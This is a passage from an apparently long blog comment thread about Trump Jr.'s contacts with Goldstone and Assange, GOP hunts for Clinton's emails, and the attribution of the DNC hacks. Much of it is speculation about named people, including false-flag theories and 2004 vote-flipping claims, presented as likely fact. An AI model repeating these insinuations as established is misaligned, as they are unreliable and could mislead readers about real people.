@Dave: Another part of what this such an amazing story is that the whole thing has the feel of an intelligence operation — getting the Trump team to do something incriminating for later leverage — but specifically a casual and routine intelligence operation involving putting out feelers to see if the Trump team would be stupid enough to reply to such an incriminating offer. Like it’s not even serious at first, but then become serious after Trump, Jr. took the bait. They didn’t need to reel him in. He jumped in the damn boat himself!
And the absurdity of the whole situation became much more transparent after a particularly ham-fisted attempt at damage control where Trump, Jr. decided to release what he says was the full email exchange with Rob Goldstone, the music publicist and acquaintance of Trump, Jr. who originally emailed Trump, Jr. about setting up the meeting. And, sure enough, those emails do provide some additional transparency about the situation. Very unsightly transparency: In the very first email to Trump Jr., Goldstone mentions how the “Crown prosecutor of Russia” wanted to help Trump. The very first email! It should have been immediately obvious that if Trump, Jr. responded to this inquiry with anything other than “No thanks” he was entering into potential Kompromat territory. But he took the bait. With glee. And the person who set the bait was Rod Goldstone, a Trump business partner/associate.
So we appear to have a Trump business partner setting the Trump team up for some sort of kompromat and the Trump team, at least Don Jr., never appears to have suspected a thing! It raises the question of just how many similar situations Felix Sater corralled the Trump team into along with questions of which government he was working for at the time. And the same question now applies to the rest of Trump’s international business associates. Because if this is how the Trump team normally acts to such explosive inquiries from its business partners there must be political blackmail material on them all over the world:
““Emin just called and asking me to contact you with something very interesting,” Goldstone wrote. “The Crown prosecutor of Russia met with his father Aras this morning and in their meeting offered to provide the Trump campaign with some official documents and information that would incriminate Hillary and her dealings with Russia and would be very useful to your father.””
Yes, Goldstone straight up tells Trump, Jr. in an email that the top prosecutor in Russia agreed to help the Trump campaign with damaging information on Hillary Clinton (or at least implies that...there is no “Crown prosecutor of Russia”). And he also makes it clear that the lawyer Trump, Jr. would be meeting to get this damaging information is also a Russian government lawyer:
And Junior seems totally cool with all of this:
Those were just some of the gems in the emails Trump, Jr. released today. And all of this is apparently news to the FBI and Special Counsel’s office.
All in all, this whole thing almost looks more like an operation to get dirt on Trump as opposed to giving dirt to him. Although, who knows, maybe they gave Trump some dirt too. But since the form of damage control Trump, Jr. is employing at this point is to basically come out and say “yeah, we wanted to get this damaging info from the Russian government, but it didn’t pan out. So what’s the big deal?”, it’s worth noting that one of the many big deals is that the Trump team doesn’t seem capable of avoiding obvious self-incriminating situations.
@Pterrafractyl–
http://www.seattletimes.com/nation-world/how-the-miss-universe-pageant-led-to-trumps-son-meeting-with-a-russian-lawyer/
“. . . .Sater worked on a plan for a Trump Tower in Moscow as recently as the fall of 2015, but he said that had come to a halt because of Trump’s presidential campaign. . . .”
That was in the fall of 2015.
In January of this year, as indicated in the “Forbes” article I linked in an above comment, Sater is also in Ukraine with Michael Cohen, working with a Ukrainian oligarch to lift sanctions against Russia.
At least that’s what we are told.
CIA, FBI (informant), Mafia–Sater touches all the bases.
Best,
Dave
CNN has an article about a 2013 behind-the-scenes video taken during the Miss USA pageant in Las Vegas of Donald Trump meeting with three of the figures involved with the now notorious June 9th meeting with Donald Trump, Jr., Jared Kushner, and Paul Manafort. In the video, Trump, along with the lawyer Michael Cohen, are seen dining with Aras Agalarov, his son Emin, and Emin’s publicist Rob Goldstone. To a large extent there’s nothing particularly surprising about the video, but it’s certainly timely. Especially now that Aras Agalarov, the person who Goldstone claimed was in contact with Russia’s “Crown Prosecutor”, is denying over making the offer and also denying even knowing Goldstone (they’ve both seen together in the 2013 video). And while it’s pretty hard to behind that Aras doesn’t know his son’s publicist, the denials by Agalarov and his lawyer do raise a pretty good question that’s also raised by the 2013 video: given how chummy Trump and Agalarov appear to be (and they are quite chummy in the videos), why on Earth wouldn’t Agalarov just pick up the phone and call Trump directly with the offer of dirt on Hillary Clinton, as opposed to have Goldstone send a highly incriminating email?:
“Aras Agalarov told Russian radio station BFM that he doesn’t know Trump Jr. personally, though he acknowledges that they “did Miss Universe” together. But Agalarov told BFM that his son Emin Agalarov does know him. Agalarov told BFM he “doesn’t really know” publicist Rob Goldstone either and he says the notion that Goldstone asked Trump Jr. to contact him about some dirt on Hillary Clinton is a “tall tale””
So Agalarov is officially denying everything, even after Trump, Jr. just released the whole email chain. And those denials include even really knowing Goldstone. And while we can’t rule out the possibility that Goldstone really did just make up the claims about Agalarov’s offer, keep in mind that Aras’s son Emin is one of Goldstone’s clients so Goldstone presumably doesn’t want to piss off the Agalarovs (and Aras presumably knows who his son’s publicist is...especially when they’re in the same 2013 video).
Still, the question raised by Agalarov’s lawyer is a pretty good one: why didn’t Agalarov just contact Trump directly about such a sensitive matter?
It’s all quite weird, even by Trump-weirdness standards.
Also don’t forget that the June 9th meeting also involved Natalia Veselnitskaya — the Russian lawyer at the center of the now notorious June 9th meeting. So Veselnitskaya would be taking a pretty big risk if she was involved in such a scheme that implicated both Aras and the “Crown Prosecutor” in writing without their knowledge. Similarly, if she was offering “Russian government” help to Trump without at least someone relatively high up in the government approving such an action that also seems like an incredible risk. At the same time, doing what they did — having Rob Goldstone straight up say ‘the Russian government wants to help you with some dirt on Hillary’ in an email to Trump, Jr. — also seems like an incredible risk...for the Russian government to take. So none if this really makes sense.
But there’s a particularly amusing, and sad (‘Sad!’) contrast of project power and influence that emerges from a piece by Leonid Bershidsky on how Veselnitskaya gives into the Russian power-structure. First, look how Trump describes Agalarovs in the above CNN piece: As the most powerful people in Russia:
Well, it would appear Aras Agalarov doesn’t share such a high opinion of Donald Trump. Or at least Trump’s relative importance. Because as Bershidsky points out, there are ‘levels’ in the Russian power structure and people at higher ‘levels’ don’t really ‘deal’ with lower-level people. And as Aras Agalarov said of Trump in recent interview, Trump just isn’t the kind of person that top-level Russians would even talk to, at least prior to becoming President. As Agalarov put it, “it’s one thing when he communicates with me. That’s, like, one level. But it’s a different matter for him to communicate with the president of the Russian Federation.” (Sad!):
“It was with the Agalarovs that Trump partnered for the 2013 Miss Universe pageant, held in Moscow. That’s how Goldstone, who arranged the presence of Trump and the contestants in an Emin Agalarov music video, knew Donald Jr. Emin, for his part, knew Veselnitskaya, queen of the regional courtrooms. Before he was elected, Trump’s level of communication in Russia was no higher than that of the Moscow Region’s elite, several notches below the Kremlin. Aras Agalarov said of Trump in a recent interview with the Russian daily Komsomolskaya Pravda.”
So Aras Agalarov did sort of lend support to Trump’s claims that he had never previously met Vladimir Putin. Maybe it’s true. Maybe Trump never had more than a a few passing interactions with Putin...because Trump wasn’t important enough. He was too “low level” for Putin’s time and prestige. Very Sad!
Also note Bershidsky’s final take on the situation: that Veselnitskaya really did use her contacts to arrange for this meeting and really did basically bait the Trump’s into a meeting promising dirt on Hillary simply to get a chance to lobby the Trump campaign about her pet issue, the Magnitsky Act:
But for Veselnitskaya to arrange all this on her own she would have needed to have been close to the “Crown prosecutor” (the prosecutor general of Russia) to get him on board with this. And Veselnitskaya is reportedly close to the prosecutor general. But if this really was a “lower-level” operation, all this would have had to have been done without Putin’s knowledge in the middle of a US presidential campaign where Trump’s ties to Russia was already a campaign issue. Would a “lower-level”, yet still relatively high-powered, Russian attorney engage in such a scheme with the Russian prosecutor general and an oligarch like Aras Agalarov engage in such a scheme on their own? It doesn’t seem like a likely scenario. But a high-level, Putin-directed operation like the one being described also doesn’t seem very likely simply because of how stupid it all is to write such an incriminating email and have goofballs like Rob Goldstone operating as the middleman.
But that’s where we are: every scenario we’re being asked to entertain is implausibly stupid. It’s one of the more unpleasant aspects of life in Trumplandia. We can’t even apply ‘Trump’s Razor’ anymore! Very Very Sad!
Here’s the latest twist on the various GOP efforts to search dark web for someone who may have hacked Hillary Clinton’s private email server. Recall how GOP financier Peter Smith was running an operation involving Michael Flynn, Steve Bannon, and Kellyanne Conway to find Hillary’s emails. And recall how that operation ended up with them consulting with ‘Alt Right’ troll Charles Johnson and Guccifer 2.0, who both reportedly recommended they contact Andrew ‘weev’ Auernheimer in their pursuits. Also recall how Johnson said he “put the word out” to a “hidden oppo network” of other right-wing groups who were more or less trying to do the same thing.
Well, in this latest twist it looks like we may have stumbled across part of that “hidden oppo network”, although there’s no indication yet that this is actually part of the network Johnson was referring to: It turns out Barbara Ledeen, wife of Michael Ledeen, apparently decided to create her own operation back in 2015 while she was a GOP staffer for the Senate judiciary committee.
Ledeen claims she was solely motivated out of fears that Hillary’s hacked emails might put her children serving in the military at risk (that’s seriously her story). Of course, as we’ve seen before, her husband, Michael, was Michael Flynn’s co-author on their book The Field of Fight: How We Can Win the Global War Against Radical Islam, a book that argues the US is already in WWIII against radical Islam the US needs to wage a full-scale religious war in response. So in addition to Flynn’s alleged involvement in Peter Smith’s “hidden oppo” team, we have the wife of the co-author on Flynn’s book also running her own operation.
Who else was involved with Barbara Ledeen email-hunting team? So far, all we know is that she asked Newt Gingrich and “an unnamed defense contractor”. Gingrich apparently wanted to bring in some more people so he reached out to Judicial Watch who, in turn, brought in another unnamed contractor who is described as an expert on the dark web.
So it looks like we can add Barbara Ledeen, Newt Gingrich, Judicial Watch, and a pair of the unnamed contractors to the list of people comprising a hidden oppo network, and perhaps the hidden oppo network Johnson was talk about.
But if that’s the case and this is the network Johnson was referring to it’s pretty remarkable coincidence that both of these networks could have been operating without knowing about each other given the closeness of Flynn and Michael Ledeen and the fact that Flynn and Ledeen’s book was published in July of 2016, implying that Flynn and Ledeen were in pretty close contact with each other in the period leading up to this.
At the same time, it’s important to note that we don’t know when Barbara Ledeen’s team stopped operating. We just know that it apparently started in 2015 according to the article below. So it’s possible the team ended its search before the Smith team started up in September of 2016. It’s one of the many significant facts we have yet to learn about this particular right-wing hacker-outreach effort:
“According to interview notes released by the FBI last year, Ledeen decided in 2015 to launch her own investigation into Clinton’s use of the server. At the time, she was a staffer on the Senate judiciary committee.”
So at some point in 2015, Barbara Ledeen decided to search the dark web for Hillary’s emails. Why? Because she wanted to see if a “foreign power” hacked them and then throw them up on the dark web which might put her children in the military at risk. That’s her story:
But she needed money so she turned to Newt Gingrich and an unnamed defense contractor. And then Gingrich brought in Judicial Watch and another contractor who was familiar with dark web. Then they all got concerned about what to do if they came across classified information and the project was later halted. That’s also her story:
Part of what’s so amusing about the ‘concerns’ over finding classified information in these emails is that that was the big prize: finding classified information in the hacked emails. ‘Putting classified information at risk’ was the charge constantly leveled against Hillary for setting up that private server so such concerns would be like going on treasure hunt and getting all concerned about finding the treasure. The only concern for them would have been concerns over how to best politically exploit such an amazing find.
But that’s her story. At least the story she told the FBI.
And then there’s the story coming out from the office of Chuck Grassley, the head of the Senate judiciary committee, distancing his committee from Ledeen: “Senator Grassley has no relationship with Barbara’s husband and wouldn’t recognise him if he saw him”:
Senator Grassley, someone who has been serving in the Senate for decades, apparently wouldn’t recognize one of the most have been influential – and controversial – players in conservative circles in Washington for decades. You have to wonder what’s prompting that kind of denial. There’s a distinct “he doth protest too much” feel to it.
So we have a Flynn-connected team going on to the dark web in 2015, and then a second Flynn-related team team doing the same thing in September 2016. And don’t forget that “scowering the dark web for Hillary’s hacked emails” is a great cover story for “going on to the dark web to hire a hacker or coordinate with a sympathetic one who will do the hacking for free”. It raises the obvious question of whether or not these two hacker-outreach efforts were part of the same overall operation: have one team arrange for the hacks and a completely separate team contact the hacker later. A hacker like, oh, say, Andrew ‘weev’ Auernheimer? Maybe?
There’s a new BuzzFeed on the cyber forensic analyst, Robert Johnston, who led the Crowdstrike investigation into the DNC server hack that helps fill in some additional details about both the March of 2016 hack allegedly carried out by APT28 (Fancy Bear) as well as the earlier 2015 hack attributed to APT29 (Cozy Bear).
One detail we hadn’t known before is how the FBI initially identified that the DNC’s server was hacked in September of 2015. The NSA informed the FBI of this. This is rather notable since it would suggest that the NSA determined the DNC’s server was hacked by watching traffic flowing from the DNC’s servers to the same command and control server that was used in the Pentagon hack. And that suggests that the FBI or NSA should have been able to see these data flows during that entire bizarre 7 month period (from September 2015 through March 2016) when the DNC was ignoring the FBI’s half-assed attempts to inform this of this hack.
Another important detail relates to both the APT29 and APT28 hacks. The 2015 hack presumed to be the work of the Russian FSB (APT29/Cozy Bear) took place some time around May 2015, the same month of the Bundestag hack. The report doesn’t indicate that the APT29 hack was part of the same wave that hit the Bundestag, but the timing is quite interesting.
Here’s where it gets extra interesting: according to Johnston, that May 2015 hack was part of a presumed Russian government hacking campaign that was rather unusual for Russian government hacking in general but not at all unusual for the DNC hacks. It was an extremely ‘noisy’ hack. Instead of the typical 5 or 6 carefully crafted phishing emails targeting a select set of individual, the May 2015 hack his 50,000–60,000 people. As Johnston put it, it was like the hackers didn’t care who saw them doing it. And Johnston should know, because that same wave of phishing attempts also hit the Pentagon and he was working for the cyber defense unit the Marine Corps had recently set up that responded to it.
Of course, part of what makes the conspicuous “I’m a Russian hacker! Watch me work!” nature of that May 2015 APT 29 hacking campaign extra conspicuous is that, as we’ve seen before, a key piece if digital evidence that led to the attribution of the March 2016 hack to APT28/Fancy Bear was that the malware used in that hack included a hard coded IP address that was the same hard coded IP address found in the May 2015 Bundestag hack’s malware. <a href=“IP ad”>And that IP address evidence is rather conspicuous evidence, both because it includes a hard coded IP address and because the server that IP address leads back to was running a vulnerable version of OpenSSL that could have allowed it to be hijacked via the Heartbleed attack. In other words, we already knew that the APT28/Fancy Bear hack was filled with conspicuous “I’m a Russian hacker!” digital evidence left behind. But now we know that the APT29 hack a year earlier also had that same “I’m a Russian hacker! Watch me work!” atypical characteristic:
“A political outsider who got the job essentially at random — the DNC literally called up CrowdStrike’s sales desk — Johnston was the lead investigator who determined the nature and scope of the hack, one he described less as a stealth burglary than as a brazen ransacking. Despite his central role, Johnston has never talked with investigators probing Russian interference, let alone with the media. But to people dealing with the crisis, “He was indispensable,” as a source close to the DNC put it.”
Less a stealth burglary and more a brazen ransacking. That was how Johnston described the DNC server hacks, which is consistent with how it’s been described before. Recall the characterization of the DNC hackers as behaving as if “Russia wanted to get caught”. But now we learn that the initial March 2015 hacks that hit tens of thousands of other targets around the world also had the ‘Russia wanted to get caught’ atypical characteristics:
“By “noisy,” he means that the attackers were drawing a huge amount of attention, sending out 50,000 phishing emails, as if they didn’t care that anyone knew what they were doing.”
It’s the latest indication that if the Russian government really was behind these hacks it wanted this whole thing to blow up in a mega-scandal which puts a hilarious twist on the apparent Russian government courtship of the Trump campaign. Team Trump thought they were partners in crime and were instead a bunch of wannabe criminal dupes getting set up for a massive embarrassment. That’s sure how it looks if these really were Russian government hackers.
And as Johnston also notes, it was the NSA who informed the FBI of the DNC APT29 hacks in the first place:
So that helps clarify the mystery of how the FBI determined the DNC was hacked in the first place, but just adds to the mystery of how that hack was allowed to continue for so long after the FBI and NSA learned this.
And with these revelations of the “I’m a Russian hacker! Watch me world!” nature of the ATP29/Cozy Bear hacking campaign of May 2015, here’s another recent article that gives some more details on the March 2016 APT28/Fancy Bear hack and how security analysts attributed it to the Russian government. Much of this is information that’s been told before. But it also makes one thing clear about the conspicuous nature of these hacks: that conspicuous OpSec ‘oopsie’ where the hackers left the privacy setting on their Bit.ly accounts — recall Bit.ly was used in the phishing emails — set to “public” so anyone in the world could see who was getting targeting in their wave of phishing attacks was critical for establishing that these hackers were primarily interested in Democrats. It was the kind of ‘whoops!’ move that sent the message to the world “I’m a Russian hacker and I’m specifically interested in Democrats!”, which, again, it rather conspicuous:
“An Associated Press investigation into the digital break-ins that disrupted the U.S. presidential contest has sketched out an anatomy of the hack that led to months of damaging disclosures about the Democratic Party’s nominee. It wasn’t just a few aides that the hackers went after; it was an all-out blitz across the Democratic Party. They tried to compromise Clinton’s inner circle and more than 130 party employees, supporters and contractors.”
And note how this March 2016 APT28 phishing blitz against the was apparently so out in the open that it caught the attention of the FBI:
But it wasn’t just the FBI watching this. Secureworks, a cybersecurity subsidiary of Dell, was also tracking ATP28’s hacking campaign. And it was able to see that it was heavily Democrats, instead of roughly equal attacks on Democrats and Republicans, who were being targeted because APT28 made the incredible OpSec error of leaving its Bit.ly account open to the public:
“The group’s hackers seemed particularly interested in Democratic officials working on voter registration issues: Pratt Wiley, the DNC’s then-director of voter protection, had been targeted as far back as October 2015 and the hackers tried to pry open his inbox as many as 15 times over six months.”
And that, of course, is just one of the many “I’m a Russian hacker!” digital clues left behind in this hacking campaign. But it’s also a “I’m a Russian hacker and I’m particulalry interested in Democrats instead of Republicans” conspicuously left digital clue.
But also note that Secureworks stumbled across this apparent OpSec mistake in March of 2016, the same month the mysterious Maltese professor and apparent Russian government proxy, Joseph Mifsud, began his outreach campaign to the Trump campaign. So if that digital clue was left intentionally and it was left by a real Russian government hacker, it’s the latest indication that these hackers were trying to make it very clear to the world that they were favoring the GOP over the Democrats, which is a remarkable clue to leave given the circumstances.
That said, let’s not forget that Guccifer 2.0 did actually release a small number of Republican emails. And they all appeared to be emails run by the notoriously shady GOP technology firm Smartech:
“While the nearly 300 Republican-related e‑mails posted on DC Leaks are uniformly innocuous, the collection is noteworthy for the scope of victims it reveals. The material includes correspondence lifted from the campaign committees of various elected officials, including Senator John McCain, Senator Lindsey Graham, and Representative Robert Hurt. Several state GOP organizations, Republican PACs, and campaign consultants also had their e‑mail accounts compromised.”
300 uniformly innocuous Republican emails. That was the extent of Guccifer’s leak of GOP emails. And they all appear to be emails that were sent from or to email address hosted by Smartech:
Was the release of a few hundred GOP emails an attempt by the hackers to seem ‘fair & balanced’? If so, it wasn’t much of an attempt. If anything, it was a conspicuously half-assed attempt.
And note the time frame of the GOP’s emails: four months ending in mid October 2015. It’s a rather odd timeframe if you think about. July-October 2015? The APT29 wave of phishing attacks was in May 2015. Was Smartech allegedly hacked in that wave or was this a different hack. Perhaps someone should ask them about that.
But also note Smartech’s notorious history: That’s the firm long accused of flipping the results Ohio result in the 2004 Presidential election! Yep, it turned out Ohio Secretary of State’s office had its website hosted by Smartech. All the voting results were run through that site and, lo and behold, Ohio experienced an inexplicable shift from John Kerry to George W. Bush. So the 300 innocuous GOP emails were apparently hacked from the GOP’s tech firm that’s a prime suspect for hacking the 2004 election. Although it wasn’t the only GOP-connected firm involved in that investigation. Another firm, GovTech, was run by Karl Rove’s IT guru Mike Connell. And it was Connell who died in the mysterious small plane crash that happened right before he was to testify after Connell said he feared for his life. THAT’s the kind of investigation that took place involving Smartech and the hacking of the 2004 election. It’s pretty notable in the current context:
“Fitrakis isn’t the only attorney involved in pursuing the truth in this matter. Cliff Arnebeck, the lead attorney in the King Lincoln case, exchanged emails with IT security expert Stephen Spoonamore. He asked Spoonamore whether or not SmarTech had the capability to “input data” and thus alter the results of Ohio’s 2004 election. His response sent a chill up my spine.”
Yeah, the answer to the question of whether or not Smartech had the capability to alter Ohio’s election results was indeed rather chilling:
Smartech appeared to be the “man in the middle” of a GOP vote-flipping operation that really could have altered the vote tabulation.
But it wasn’t the only GOP firm that was part of this operation:
THAT’s the background of the Smartech, the ONLY GOP firm to apparently get hacked and have its email released. 300 innocuous emails.
So let’s review:
1. We have a shockingly “noisy” hacking campaign in May of 2015 that hits the DNC. A campaign seemingly designed to get the world pissed off at Russia for hacking them.
2. We have another shockingly “noisy” hacking campaign in March of 2016 that hits the DNC again, and this time the noisiness includes leaving the Bit.ly accounts open to the world so everyone could see that the hackers were focusing on Democrats but not just Democrats. That Bit.ly mistake also showed phishing targets that were filled with Putin’s adversaries around the globe. So it clearly sent the message of “I’m a Russian hacker!” but also, more subtly, “and I’m mostly just focused on Democrats in the US political arena!” That was the pair of conspicuous messages sent.
3. But emails released by Guccifer 2.0 did include 300 innocuous GOP emails. All from email accounts hosted by Smartech, one of the key GOP firms suspected of hacking the 2004 election.
4. We know that multiple teams of GOP operatives were search for Hillary’s emails (temas led by Peter Smith, Barbara Leeden, and the yet-to-be identified group Charles Johnson was in touch with), and we also know these are the types of people that would have been willing to get these emails under any circumstances which raises the obvious possibility that these GOP teams were willing to carry out the hacks themselves (but would obviously want to redirect the blame elsewhere).
5. We know Joseph Mifsud, the mysterious Maltese professor, dangled the temnptation of thousands of Hillary’s emails to the Trump team in what appeared to be a covert outreach attempt with the Trump campaign, but we also know that that the GOP felt like they never really got what they were looking for because Peter Smith’s team kept searching the Dark Web for ‘Russian hackers’ with Hillary’s 33,000 deleted private emails will into August of 2016, after the DNC emails were already released.
6. We know that the contact with Donald Trump, Jr. initiated by Rob Goldstone in early June that led to the Russian delegation Trump Tower meeting on June 9th, included absurdly over-the-top incriminating details like sending Trump Jr. an email saying ‘the Russian government wants to help you’ that really doomed the Trump team in during the subsequent investigations.
Taken all together,and given that we know the GOP was clearly very interested in hacking Hillary, and we know these hacking campaigns were filled with conpicuous “I’m a Russian clues” that were leading to the Russian government getting blamed for all these hacks, it raises a rather hilarious possibility: if the May 2015 hacking campaigns, including the high profile Bundestag hack that was blamed on Russia, weren’t carried out by the Russian government, the Russian government would surely know it’s being set up. Moscow is presumably following all the global hacking campaigns too and attribution too. And don’t forget, Barbara Ledeen was apparently searching the Dark Web for hackers with Hillary’s emails in 2015, and if she stumbled across any Russian agents it might have been clear what the GOP was up to. And we have no idea when Ledeen’s Dark Web search ended, so if she was still searching for Hillary’s deleted personal emails in early 2016 and still reaching out to hackers in the Dark Web about this it could have been obvious to Moscow what the GOP wanted and thatthey still didn’t have what they were looking for.
So is it possible that the outlandish Russian outreach campaign targeting the GOP was partly a preemptive defensive measure designed to let the GOP implicate itself in a hacking operation not carried out by Moscow but Moscow assumed was going to be blamed on it? In other words, the general assumption following the wave of revelations about Russian contacts with the Trump campaign and promises of Hillary’s emails are being interpreted as meaning the Russians must have been behind the actual hacks. But when you consider how the “noise” the GOP was already sending about its interest in Hillary’s emails in 2015, and consider that the only GOP emails released were from Smartech, a firm already implicated in hacking the 2004 election, there’s no reason to exclude the possibility of other hackers actually carried out the hacks, the Russians knew this was happening, and decided to ensure that if they were going to take the blame they would share it with the GOP.
Is that feasible possible given all the facts at hand? Because it seems like it would be a really effective strategy if the Kremlin thought it was about to be set up. At least, effective against the Trump team.
Either way, it shouldn’t someone be looking into whether or not Smartech was actually hacked? As opposed to Smartech providing those emails to “Guccifer 2.0” to a ‘fair & balanced’ feel to the thing? That seems like an important fact that hasn’t actually been remotely established in this whole mess.
It happened again. Donald Trump Jr. was just caught engaging in some rather incriminating correspondences. This time over Twitter’s direct messaging (DM) system. With Julian Assange. So we have an answer to the question of whether or not the Trump team was in direct communication with Wikileaks: Yes they were. A lot. From September 2016 through the election and even some 2017.
It started off on September 20, 2016, when Assange informed Trump Jr. that Wikileaks had successfully guessed the password for the website of a new anti-Trump political action committee and wanted to know if Don Jr. had “any comments”. Keep in mind that this is basically a conversation about stolen digital material. So we have an opening message from Julian Assange sent via Twitter offering stolen material much like the bizarre opening opening email that Rob Goldstone sent to Don Jr. about the Russian government wanting to help the Trump team with ‘dirt’ on Hillary.
And as was the case with Goldstone’s offer, Don Jr. appeared to be more than happy to receive the help. According to one source he actually informed top Trump campaign staffers (Steve Bannon, Kellyanne Conway, and Jared Kushner) that Wikileaks had made contact when it first happened.
It appears that the correspondence was mostly one-sided, with Assange sending Trump Jr. suggestions or zany schemes (like trying to get Assange appointed Australia’s ambassador to the US). And both Trump Jr. and Trump Sr. appear to have actually follow the advice Assange was sending them at different points.
The Trumps fortunately didn’t take the last bit of advice Assange sent to them on election day when it still looked like Hillary Clinton was going to win. Unfortunately, they didn’t take his advice because Trump won and Julian’s advice was for Trump not to concede if he lost and instead say the election was rigged:
“The messages, obtained by The Atlantic, were also turned over by Trump Jr.’s lawyers to congressional investigators. They are part of a long—and largely one-sided—correspondence between WikiLeaks and the president’s son that continued until at least July 2017. The messages show WikiLeaks, a radical transparency organization that the American intelligence community believes was chosen by the Russian government to disseminate the information it had hacked, actively soliciting Trump Jr.’s cooperation. WikiLeaks made a series of increasingly bold requests, including asking for Trump’s tax returns, urging the Trump campaign on Election Day to reject the results of the election as rigged, and requesting that the president-elect tell Australia to appoint Julian Assange ambassador to the United States”
A long, and largely one-sided, correspondence between Wikileaks and Trump Jr. That’s another giant ‘uh oh’ for Don Jr. An ‘uh oh’ involving a discussion about Wikileaks breaking into an anti-Trump website (even if you guess the password correctly for a website that’s still considered break into it):
And not only does Don Jr. respond with “Thank” 12 hours later, but he then informs senior Trump campaign team members about this:
So the Assange/Don Jr. correspondences start September 20th. The correspondences continues, with Assange sending links he thinks Don Jr. should be promoting on October 3rd and Don Jr. responding “What’s behind this Wednesday leak I keep reading about,” a reference to Roger Stone’s tweet, “Wednesday@HillaryClinton is done. #WikiLeaks,” sent a day earlier. Assange doesn’t reply, but then on October 7th the Podesta emails get leaked less than an hour after the Access Hollywood tape is leaked. So we have Don Jr. asking Assange about an upcoming leak that Roger Stone warned about and that leak occurs a few days later:
And on October 12, five days after the Podesta emails get released, Assange writes to Don Jr. with a recommendation for Trump to promote a Wikileaks site set up to help people sift through the stolen documents. Don Jr. doesn’t reply, but 15 minutes after that DM for Assange Trump tweets out that exact link:
15 minutes after Assange makes a recommendation and Trump Sr. tweets it out. Uh oh.
Assange tests the waters again on Octobe 21st with his proposal for Trump to leak his own tax returns to Wikileaks in order to give Wikileaks an air of impartiality (recall how Trump did actually appear to leak his own tax returns in March of this year). And then on November 8th, he makes a truly ominous suggestion: contest the election if he loses and call it all rigged:
Assange then follows up in December with a request that Trump troll world by pushing to have him made Australia’s ambassador to the US. Then Assange largely goes quiet, until July of this year after after news of Trump Jr.‘s meeting with Rob Goldstone and the Russian delegation in Trump Tower. It turns out it was Julian Assange who made the suggestion that Don Jr. leak all those correspondences to Wikileaks who would leak it to the world and instead Don Jr., who doesn’t respond to the DM, does the leaking himself hours later:
So we have this extensive digital trail of evidence that not only demonstrates an open line of communication between Julian Assange and the Trump campaign but also demonstrates the Trump team taking Assange’s advice. A digital trail left on Twitter! Yes, two very prominent people deeply involved with one of the biggest political scandals in American history were leaving extensive digital evidence of their open lines of communication with each other on Twitter!
It’s rather amazing. Perhaps even more amazing than the incriminating emails between Rob Goldstone and Don Jr. because it’s one thing for someone like Rob Goldstone to send an incriminating email. Rob Goldstone presumably wasn’t under surveillance at the time he sent that email. But Assange’s communications presumably are under surveillance. Especially his Twitter communications. Does Assange assume his Twitter DMs aren’t been monitored? He’s Julian Assange! Of course they’re being monitored if that’s a possibility. And Twitter doesn’t make their DMs super-encrypted and beyond law enforcement. So unless these DMs were sent using additional steps to encrypt the messages it’s hard to see how Assange couldn’t know full well that he was leaving a digital trail tying himself back to the Trump campaign by choosing Twitter as the medium of communication.
And don’t forget, these messages started in September or 2016, months after Wikileaks become a central figure in the campaign by leaking the DNC emails. Wikileaks was already guaranteed to be under extensive US surveillance for that alone. And yet Julian Assange decides to using a medium like Twitter. One thing that’s not entirely clear from the story is whether or not he was using his official “Julian Assange” account or some more obscure account to send the DMs. But if this we his official Julian Assange account that would have been a remarkable move because if there’s one Twitter account that you can assume is under surveillance by intelligence agencies around the world its Julian Assange’s account.
It’s almost amazing it took this long for these messages to come out considering who was sending them. Although perhaps what’s most amazing is that this entire Don Jr. & Julian situation is not at all amazing in the context of the entire #TrumpRussia investigation. Given the spy-farce nature of this entire saga, the Don Jr. & Julian drama should pretty much be expected. Which is pretty amazing.
Here’s an interesting twist to Julian Assange’s recently discovered correspondences with Donald Trump Jr.: The initial story that Assange message Trump Jr. about on September 20, 2016 — about new anti-Trump website that was about to launch — was a story that Charles “Chuck” Johnson wrote about on his GotNews website just a couple hours before Assange reached out to Trump Jr.
And while it’s unclear if Johnson was in contact with Assange at this point — Johnson’s comments at the time suggest otherwise — it’s still rather interesting given the apparent relations Johnson has with Wikileaks now: Roger Stone says that he has a “libertarian opinion journalist” contact with Wikileaks, and that sure sounds like Johnson, although has vehemently denied it was Johnson. Additionally, Johnson reportedly helped arrange a meeting between Congressman Dana Rohrabacher and Assange in August of this year. So whether or not Johnson and Assange had an open line of communication at the time of the September 20, 2016, outreach to Trump Jr., it’s unambiguous that they have an open line of communication now. And let’s not forget about Johnson’s role in advising the quest to find Hillary Clinton’s hacked personal emails on the Dark Web, where he recommended to Peter Smith’s team that they contact “Guccifer 2.0” and Andrew “weev” Auernheimer about those hacked emails (Johnson and Auernheimer has a history of working together).
Given all those contacts, if Johnson wasn’t in direct contact with Wikileaks as of September 20, 2016, he probably at least knew someone who was:
“Charles Johnson, who calls himself an independent journalist and runs a site called GotNews, published an article at about 9:30 p.m. ET on September 20, 2016, claiming he had “obtained a memo from a George Soros-tied PR firm that is launching a website to spread conspiracy theories about Donald Trump’s connections to Russia.” Soros is the investor and business magnate who has become a favorite bogeyman of the far right”
That was about two hours before Assange reached out to Trump Jr., which appears to be why Johnson was so excited to see Wikileaks promoting the story shortly after Assange sent that message to Trump:
But also note the language Assange used when reaching out to Trump Jr. He makes it sound like Wikileaks was the one who discovered this news and figured out the “putintrump” password for the anti-Trump website:
That sure sounds like Assange is assuming that this is a Wikileaks exclusive story he’s got on his hands, just as Johnson’s GotNews story behaved as if this was exclusive to GotNews. And that raises an interesting question: did the same source send both GotNews.com and Wikileaks information about this website at the same time? Did Wikileaks and GotNews independently arrive at the same story that they independently published within hours of each other because they were both got a hot tip from the same source? Or did Wikileaks read the GotNews story and then decide to reach out to Trump Jr., asking for a comment on it, and act like Wikileaks had this exclusive info?
If it’s the latter scenario, that would have been rather risky on Assange’s part because there’s no guarantee that the Trump team wouldn’t have already been aware of the GotNews story put up a couple hours earlier. GotNews is exactly the kind of site the Trump team would have been keenly monitoring.
But if it’s the former scenario, it raises another question: Since Assange says “We have guessed the password”, and yet GotNews appears to have also guessed the password, did Assange inadvertently reveal a much closer relationship to GotNews than previously acknowledged? In other words, are they so close that Assange considers GotNews to be part of ‘team Wikileaks’? It sure would explain a lot.
The BBC has an new piece on the server used by the hackers identified as APT28/Fancy Bear for the DNC server hacks of March 2016 and the Bundestag hack of 2015. Recall that the IP address of a command & control server was found hardcoded into the malware found from both the Bundestag hack and the DNC server hack. The piece is about the company that hosted that command & control sever.
The piece contains a number of interesting fun facts about how the hacking took place. And, as we should expect at this point, it also raises a number of questions.
Here’s some of the fun facts:
